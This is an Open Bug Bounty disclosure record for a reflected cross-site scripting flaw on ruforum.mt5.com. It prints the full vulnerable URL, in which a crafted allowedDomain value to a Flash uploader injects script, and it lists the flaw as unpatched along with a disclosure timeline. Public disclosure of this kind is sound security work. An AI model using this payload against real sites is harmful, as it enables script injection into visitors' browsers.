ruforum.mt5.com XSS vulnerability

2016-03-24T21:30:00
ID OBB:143193
Type openbugbounty
Reporter mradamdavies
Modified 2016-05-20T07:11:00

Description

Vulnerable URL:
http://ruforum.mt5.com/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{prompt%28/XSSPOSED/%29;}//
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 3
VIP website status:| No
Check ruforum.mt5.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 24 March, 2016 21:30 GMT
Vulnerability existence verified and confirmed| 25 March, 2016 06:31 GMT
Notification sent to subscribers (without technical details)| 25 March, 2016 10:17 GMT
Vulnerability details disclosed by researcher| 20 May, 2016 07:11 GMT